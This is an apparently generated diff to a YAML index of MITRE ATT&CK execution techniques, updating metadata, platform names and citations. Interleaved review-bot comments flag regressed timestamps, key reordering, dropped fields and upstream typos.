technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
- type: attack-pattern
- created: '2019-12-03T14:25:00.538Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1053.003
- url: https://attack.mitre.org/techniques/T1053/003
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T18:45:51.945Z'
name: 'Scheduled Task/Job: Cron'
description: "Adversaries may abuse the cron
utility to perform
task scheduling for initial or recurring execution of malicious code.(Citation:
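Review bot: this hunk removes `spec_version: '2.1'` from T1204.002 in the same breath as it bumps `x_mitre_attack_spec_version` from 3.1.0 to 3.2.0, and then rewrites the whole T1053.003 object by deleting its `x_mitre_platforms`, `id`, `type`, `created`, `external_references` and `object_marking_refs` keys only to re-add them further down. Dropping a field while raising the spec version usually means the generator was pointed at a different upstream bundle, not that the schema changed; please state in the commit message which ATT&CK release and which STIX bundle this index was regenerated from, and have the generator emit keys in a fixed order so a regeneration shows up as the three real changes here (`modified`, `x_mitre_version`, spec version) rather than a delete-and-reinsert of every key.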
@@ -25091,6 +25389,7 @@ execution:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_deprecated: false
x_mitre_detection: "Monitor scheduled task creation from common utilities using
command-line invocation. Legitimate scheduled tasks may be created during
installation of new software or through system administration functions. Look
@@ -25101,9 +25400,13 @@ execution:
part of a chain of behavior that could lead to other activities, such as network
connections made for Command and Control, learning details about the environment
through Discovery, and Lateral Movement. "
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'Process: Process Creation'
@@ -25111,8 +25414,24 @@ execution:
- 'Command: Command Execution'
x_mitre_permissions_required:
- User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--2acf44aa-542f-4366-b4eb-55ef5747759c
+ created: '2019-12-03T14:25:00.538Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1053/003
+ external_id: T1053.003
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1053.003
atomic_tests: []
T1559.001:
@@ -25152,7 +25471,7 @@ execution:
description: Nelson, M. (2017, January 5). Lateral Movement using the MMC20
Application COM Object. Retrieved November 21, 2017.
source_name: Enigma MMC20 COM Jan 2017
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-07-26T22:51:20.448Z'
name: Component Object Model
description: |-
Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by [Remote Services](https://attack.mitre.org/techniques/T1021) such as [Distributed Component Object Model](https://attack.mitre.org/techniques/T1021/003) (DCOM).(Citation: Fireeye Hunting COM June 2019)
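Review bot: the `modified` timestamp for T1559.001 goes backwards here, from `'2022-04-25T14:00:00.188Z'` to `'2021-07-26T22:51:20.448Z'`. Every other object in this diff moves its `modified` forward to 2024, so an older timestamp landing in the index means this object is being taken from an older source than what is already committed. Check whether the rest of the Component Object Model entry is being rolled back as well and, if the upstream object really carries the 2021 date, note why in the commit message.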
@@ -25177,12 +25496,10 @@ execution:
- 'Script: Script Execution'
- 'Process: Process Creation'
x_mitre_remote_support: true
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -25262,11 +25579,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.002:
technique:
- modified: '2024-03-01T19:06:05.126Z'
+ modified: '2024-10-15T14:18:20.087Z'
name: 'Command and Scripting Interpreter: AppleScript'
description: |-
Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.
@@ -25326,12 +25642,11 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059.002
atomic_tests: []
T1106:
technique:
- modified: '2023-10-13T16:01:07.538Z'
+ modified: '2024-09-12T15:25:57.058Z'
name: Native API
description: |-
Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.(Citation: NT API Windows)(Citation: Linux Kernel API) These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
@@ -25429,9 +25744,9 @@ execution:
2021.
url: https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/
- source_name: Microsoft CreateProcess
- description: Microsoft. (n.d.). CreateProcess function. Retrieved December
- 5, 2014.
- url: http://msdn.microsoft.com/en-us/library/ms682425
+ description: Microsoft. (n.d.). CreateProcess function. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createprocessa
- source_name: Microsoft Win32
description: Microsoft. (n.d.). Programming reference for the Win32 API. Retrieved
March 15, 2020.
@@ -25448,19 +25763,18 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1106
atomic_tests: []
T1059.010:
technique:
- modified: '2024-04-10T16:05:22.456Z'
+ modified: '2024-04-28T15:58:48.119Z'
name: AutoHotKey & AutoIT
description: |-
Adversaries may execute commands and perform malicious tasks using AutoIT and AutoHotKey automation scripts. AutoIT and AutoHotkey (AHK) are scripting languages that enable users to automate Windows tasks. These automation scripts can be used to perform a wide variety of actions, such as clicking on buttons, entering text, and opening and closing programs.(Citation: AutoIT)(Citation: AutoHotKey)
Adversaries may use AHK (`.ahk`) and AutoIT (`.au3`) scripts to execute malicious code on a victim's system. For example, adversaries have used for AHK to execute payloads and other modular malware such as keyloggers. Adversaries have also used custom AHK files containing embedded malware as [Phishing](https://attack.mitre.org/techniques/T1566) payloads.(Citation: Splunk DarkGate)
- These scripts may also be compiled into self-contained exectuable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
+ These scripts may also be compiled into self-contained executable payloads (`.exe`).(Citation: AutoIT)(Citation: AutoHotKey)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
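Review bot: the spelling fix `exectuable` to `executable` is correct, and the unchanged context line two above it still reads "adversaries have used for AHK to execute payloads", which has a stray "for". That sentence is upstream ATT&CK text, so it should be fixed in the source bundle rather than hand-edited in a generated index, but it is worth filing so the next regeneration picks it up.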
@@ -25469,7 +25783,7 @@ execution:
- Liran Ravich, CardinalOps
- Serhii Melnyk, Trustwave SpiderLabs
- Rahmat Nurfauzi, @infosecn1nja, PT Xynexis International
- - Monty
+ - "@_montysecurity"
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -25506,11 +25820,10 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1059.009:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T15:44:20.143Z'
name: Cloud API
description: "Adversaries may abuse cloud APIs to execute malicious commands.
APIs available in cloud environments provide various functionalities and are
@@ -25547,11 +25860,10 @@ execution:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- IaaS
- - Azure AD
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Command: Command Execution'
x_mitre_remote_support: false
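Review bot: replacing the platform values `Azure AD`, `Office 365` and `Google Workspace` with `Office Suite` and `Identity Provider` on T1059.009 changes the strings that any platform-filtered view of this index keys on. Anything that selects techniques by the old names will now silently match nothing rather than fail, so the platform-specific index generation and any tests that filter on platform need to be run against the new names before this lands, and the same rename appears on T1059 further down in this diff.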
@@ -25570,13 +25882,12 @@ execution:
url: https://github.com/Azure/azure-powershell
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1610:
technique:
- modified: '2024-04-11T21:24:42.680Z'
+ modified: '2024-10-15T15:06:17.124Z'
name: Deploy a container
description: |-
Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment. In Kubernetes environments, an adversary may attempt to deploy a privileged or vulnerable container into a specific node in order to [Escape to Host](https://attack.mitre.org/techniques/T1611) and access other containers running on the node. (Citation: AppSecco Kubernetes Namespace Breakout 2020)
@@ -25655,7 +25966,6 @@ execution:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1610
atomic_tests:
- name: Deploy Docker container
@@ -25694,7 +26004,7 @@ execution:
\n"
T1059:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: Command and Scripting Interpreter
description: |-
Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).
@@ -25705,6 +26015,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_deprecated: false
x_mitre_detection: |-
Command-line and scripting activities can be captured through proper logging of process execution with command-line arguments. This information can be useful in gaining additional insight to adversaries' actions through how they use native processes or custom tools. Also monitor for loading of modules associated with specific languages.
@@ -25715,16 +26026,16 @@ execution:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Linux
- macOS
- Windows
- Network
- - Office 365
- - Azure AD
- IaaS
- - Google Workspace
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'Script: Script Execution'
- 'Process: Process Creation'
@@ -25755,14 +26066,11 @@ execution:
url: https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1059
atomic_tests: []
T1609:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:25:45.507Z'
name: Kubernetes Exec Into Container
description: |-
Adversaries may abuse a container administration service to execute commands within a container. A container administration service such as the Docker daemon, the Kubernetes API server, or the kubelet may allow remote management of containers within an environment.(Citation: Docker Daemon CLI)(Citation: Kubernetes API)(Citation: Kubernetes Kubelet)
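Review bot: the deletions of `x_mitre_attack_spec_version: 3.1.0` and `x_mitre_modified_by_ref` here are the other half of the insertions earlier in the same T1059 object, where `+ x_mitre_attack_spec_version: 3.2.0` now sits after `kill_chain_phases` and `x_mitre_modified_by_ref` after `x_mitre_is_subtechnique`. The net change is a 3.1.0 to 3.2.0 bump plus a key reorder, but read hunk by hunk it looks like two fields were dropped. Emitting keys in a stable order from the generator would make this a two-line diff and make the next review much cheaper.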
@@ -25828,9 +26136,8 @@ execution:
url: https://kubernetes.io/docs/concepts/overview/kubernetes-api/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1609
atomic_tests:
- name: ExecIntoContainer
@@ -25913,32 +26220,7 @@ execution:
elevation_required: false
T1569.001:
technique:
- x_mitre_platforms:
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
- type: attack-pattern
- created: '2020-03-10T18:26:56.187Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1569.001
- url: https://attack.mitre.org/techniques/T1569/001
- - source_name: Launchctl Man
- url: https://ss64.com/osx/launchctl.html
- description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
- - url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
- description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
- Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
- source_name: Sofacy Komplex Trojan
- - source_name: 20 macOS Common Tools and Techniques
- url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
- description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
- Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-20T20:14:35.179Z'
name: 'System Services: Launchctl'
description: |
Adversaries may abuse launchctl to execute commands or programs. Launchctl interfaces with launchd, the service management framework for macOS. Launchctl supports taking subcommands on the command-line, interactively, or even redirected from standard input.(Citation: Launchctl Man)
@@ -25947,6 +26229,7 @@ execution:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: execution
+ x_mitre_deprecated: false
x_mitre_detection: "Every Launch Agent and Launch Daemon must have a corresponding
plist file on disk which can be monitored. Monitor for recently modified or
created plist files with a significant change to the executable path executed
@@ -25959,19 +26242,42 @@ execution:
are potentially suspicious. \n\nWhen removing [Launch Agent](https://attack.mitre.org/techniques/T1543/001)s
or [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)s ensure
the services are unloaded prior to deleting plist files."
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Command: Command Execution'
- 'Service: Service Creation'
- 'File: File Modification'
- x_mitre_permissions_required:
- - User
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_remote_support: false
+ type: attack-pattern
+ id: attack-pattern--810aa4ad-61c9-49cb-993f-daa06199421d
+ created: '2020-03-10T18:26:56.187Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1569/001
+ external_id: T1569.001
+ - source_name: Sofacy Komplex Trojan
+ description: Dani Creus, Tyler Halfpop, Robert Falcone. (2016, September 26).
+ Sofacy's 'Komplex' OS X Trojan. Retrieved July 8, 2017.
+ url: https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/
+ - source_name: 20 macOS Common Tools and Techniques
+ description: Phil Stokes. (2021, February 16). 20 Common Tools & Techniques
+ Used by macOS Threat Actors & Malware. Retrieved August 23, 2021.
+ url: https://labs.sentinelone.com/20-common-tools-techniques-used-by-macos-threat-actors-malware/
+ - source_name: Launchctl Man
+ description: SS64. (n.d.). launchctl. Retrieved March 28, 2020.
+ url: https://ss64.com/osx/launchctl.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1569.001
atomic_tests: []
T1059.008:
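Review bot: T1569.001 loses `x_mitre_permissions_required` with its `User` and `root` entries here, while the T1053.003 object earlier in this same diff keeps `x_mitre_permissions_required:` with `- User` as unchanged context. If the field is being retired across the index it should disappear everywhere in one change; if it is not, dropping it only from Launchctl discards the user-versus-root distinction that the surrounding detection text (Launch Agents versus Launch Daemons) relies on. Please make the treatment consistent and say which it is.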
@@ -26014,7 +26320,7 @@ execution:
data, modify startup configuration parameters to load malicious system software,
or to disable security features or logging to avoid detection.(Citation: Cisco
Synful Knock Evolution)"
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T20:28:09.848Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Network Device CLI
x_mitre_detection: |-
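Review bot: the T1059.008 `modified` timestamp regresses from `'2022-05-11T14:00:00.188Z'` to `'2022-04-19T20:28:09.848Z'`, and the following context shows this object left at `x_mitre_attack_spec_version: 2.1.0` and without the `x_mitre_deprecated`, `revoked` and `x_mitre_domains` keys that the refreshed objects carry. Either the Network Device CLI entry was not regenerated with the rest or it came from a different bundle; confirm which, since a partially refreshed index mixes two schema versions in one file.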
@@ -26030,72 +26336,75 @@ execution:
x_mitre_remote_support: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1559.003:
technique:
- x_mitre_platforms:
- - macOS
+ modified: '2024-10-16T16:14:12.793Z'
+ name: XPC Services
+ description: |-
+ Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
+
+ Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: execution
+ x_mitre_contributors:
+ - Csaba Fitzl @theevilbit of Kandji
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
x_mitre_domains:
- enterprise-attack
- x_mitre_contributors:
- - Csaba Fitzl @theevilbit of Offensive Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - macOS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Process: Process Access'
+ x_mitre_remote_support: false
type: attack-pattern
id: attack-pattern--8252f135-ed26-4ce1-ae61-f26e94429a19
created: '2021-10-12T06:45:36.763Z'
- x_mitre_version: '1.0'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1559.003
url: https://attack.mitre.org/techniques/T1559/003
+ external_id: T1559.003
- source_name: creatingXPCservices
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
description: Apple. (2016, September 9). Creating XPC Services. Retrieved
April 19, 2022.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingXPCServices.html#//apple_ref/doc/uid/10000172i-SW6-SW1
- source_name: Designing Daemons Apple Dev
- url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
description: Apple. (n.d.). Retrieved October 12, 2021.
+ url: https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/DesigningDaemons.html
- source_name: CVMServer Vuln
- url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
description: 'Mickey Jin. (2021, June 3). CVE-2021-30724: CVMServer Vulnerability
in macOS and iOS. Retrieved October 12, 2021.'
+ url: https://www.trendmicro.com/en_us/research/21/f/CVE-2021-30724_CVMServer_Vulnerability_in_macOS_and_iOS.html
- source_name: Learn XPC Exploitation
- url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
description: Wojciech Reguła. (2020, June 29). Learn XPC exploitation. Retrieved
October 12, 2021.
- x_mitre_deprecated: false
- revoked: false
- description: |-
- Adversaries can provide malicious content to an XPC service daemon for local code execution. macOS uses XPC services for basic inter-process communication between various processes, such as between the XPC Service daemon and third-party application privileged helper tools. Applications can send messages to the XPC Service daemon, which runs as root, using the low-level XPC Service C API
or the high level NSXPCConnection API
in order to handle tasks that require elevated privileges (such as network connections). Applications are responsible for providing the protocol definition which serves as a blueprint of the XPC services. Developers typically use XPC Services to provide applications stability and privilege separation between the application client and the daemon.(Citation: creatingXPCservices)(Citation: Designing Daemons Apple Dev)
-
- Adversaries can abuse XPC services to execute malicious content. Requests for malicious execution can be passed through the application's XPC Services handler.(Citation: CVMServer Vuln)(Citation: Learn XPC Exploitation) This may also include identifying and abusing improper XPC client validation and/or poor sanitization of input parameters to conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).
- modified: '2022-05-24T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: XPC Services
- x_mitre_detection: ''
- kill_chain_phases:
- - phase_name: execution
- kill_chain_name: mitre-attack
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'Process: Process Access'
- x_mitre_remote_support: false
- x_mitre_attack_spec_version: 2.1.0
+ url: https://wojciechregula.blog/post/learn-xpc-exploitation-part-3-code-injections/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1204:
technique:
- modified: '2024-04-12T03:46:49.507Z'
+ modified: '2024-11-11T18:52:12.103Z'
name: User Execution
description: |-
An adversary may rely upon specific actions by a user in order to gain execution. Users may be subjected to social engineering to get them to execute malicious code by, for example, opening a malicious document file or link. These user actions will typically be observed as follow-on behavior from forms of [Phishing](https://attack.mitre.org/techniques/T1566).
While [User Execution](https://attack.mitre.org/techniques/T1204) frequently occurs shortly after Initial Access it may occur at other phases of an intrusion, such as when an adversary places a file in a shared directory or on a user's desktop hoping that a user will click on it. This activity may also be seen shortly after [Internal Spearphishing](https://attack.mitre.org/techniques/T1534).
- Adversaries may also deceive users into performing actions such as enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary; running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s; or downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204).(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ Adversaries may also deceive users into performing actions such as:
+
+ * Enabling [Remote Access Software](https://attack.mitre.org/techniques/T1219), allowing direct control of the system to the adversary
+ * Running malicious JavaScript in their browser, allowing adversaries to [Steal Web Session Cookie](https://attack.mitre.org/techniques/T1539)s(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)
+ * Downloading and executing malware for [User Execution](https://attack.mitre.org/techniques/T1204)
+ * Coerceing users to copy, paste, and execute malicious code manually(Citation: Reliaquest-execution)(Citation: proofpoint-selfpwn)
For example, tech support scams can be facilitated through [Phishing](https://attack.mitre.org/techniques/T1566), vishing, or various forms of user interaction. Adversaries can use a combination of these methods, such as spoofing and promoting toll-free numbers or call centers that are used to direct victims to malicious websites, to deliver and execute payloads containing malware or [Remote Access Software](https://attack.mitre.org/techniques/T1219).(Citation: Telephone Attack Delivery)
kill_chain_phases:
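Review bot: the new T1204 bullet `* Coerceing users to copy, paste, and execute malicious code manually` misspells "Coercing", and since this text is copied from upstream ATT&CK the fix belongs in the source bundle, with a note here so it is not lost. Two further things in this hunk deserve a line in the commit message: the `(Citation: Talos Roblox Scam 2023)(Citation: Krebs Discord Bookmarks 2023)` references that previously closed the whole sentence now attach only to the JavaScript bullet, which narrows what they are cited for, and the T1559.003 contributor line changes from `Csaba Fitzl @theevilbit of Offensive Security` to `of Kandji`, which is an affiliation update rather than a data refresh and should be called out as such.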
@@ -26103,7 +26412,11 @@ execution:
phase_name: execution
x_mitre_contributors:
- Oleg Skulkin, Group-IB
- - Goldstein Menachem
+ - Menachem Goldstein
+ - Harikrishnan Muthu, Cyble
+ - ReliaQuest
+ - Ale Houspanossian
+ - Fernando Bacchin
x_mitre_deprecated: false
x_mitre_detection: |-
Monitor the execution of and command-line arguments for applications that may be used by an adversary to gain Initial Access that require user interaction. This includes compression applications, such as those for zip files, that can be used to [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140) in payloads.
@@ -26118,7 +26431,7 @@ execution:
- macOS
- IaaS
- Containers
- x_mitre_version: '1.6'
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Instance: Instance Start'
- 'File: File Creation'
@@ -26145,6 +26458,10 @@ execution:
description: Brian Krebs. (2023, May 30). Discord Admins Hacked by Malicious
Bookmarks. Retrieved January 2, 2024.
url: https://krebsonsecurity.com/2023/05/discord-admins-hacked-by-malicious-bookmarks/
+ - source_name: Reliaquest-execution
+ description: Reliaquest. (2024, May 31). New Execution Technique in ClearFake
+ Campaign. Retrieved August 2, 2024.
+ url: https://www.reliaquest.com/blog/new-execution-technique-in-clearfake-campaign/
- source_name: Telephone Attack Delivery
description: 'Selena Larson, Sam Scholten, Timothy Kromphardt. (2021, November
4). Caught Beneath the Landline: A 411 on Telephone Oriented Attack Delivery.
@@ -26155,15 +26472,19 @@ execution:
API forms and more to scam users in popular online game “Roblox”. Retrieved
January 2, 2024.
url: https://blog.talosintelligence.com/roblox-scam-overview/
+ - source_name: proofpoint-selfpwn
+ description: 'Tommy Madjar, Dusty Miller, Selena Larson. (2024, June 17).
+ From Clipboard to Compromise: A PowerShell Self-Pwn. Retrieved August 2,
+ 2024.'
+ url: https://www.proofpoint.com/us/blog/threat-insight/clipboard-compromise-powershell-self-pwn
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
